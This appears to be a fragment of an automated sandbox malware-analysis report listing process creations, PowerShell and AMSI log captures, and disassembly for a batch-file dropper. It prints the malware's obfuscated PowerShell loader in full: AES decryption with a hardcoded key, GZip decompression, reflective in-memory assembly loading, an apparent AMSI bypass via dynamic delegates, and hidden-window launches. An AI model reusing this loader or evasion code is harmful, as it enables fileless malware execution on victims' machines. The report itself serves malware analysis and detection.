Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: DetailSequence=1DetailTotal=1SequenceNumber=27UserId=WORKGROUP\SYSTEMHostName=ConsoleHostHostVersion=5.1.19041.1682HostId=fa30d40e-d0d2-4405-85db-7bb3a1a8c1b8HostApplication=C:\Windows\System32\Window
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,19_2_0000022413901E3C
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138EA7DD push rcx; retf 003Fh19_3_00000224138EA7DE
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000002BCD7E1A7DD push rcx; retf 003Fh20_3_000002BCD7E1A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8B23FB pushad ; retf 36_2_00007FFD9B8B2411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BFFE push eax; retf 36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98B7F8 push eax; retf 36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C829 push ds; retf 36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BF5F push eax; retf 36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C749 push ds; retf 36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BE69 push eax; retf 36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98CA5F push ds; retf 36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BD89 push eax; retf 36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C9BE push ds; retf 36_2_00007FFD9B98CB79
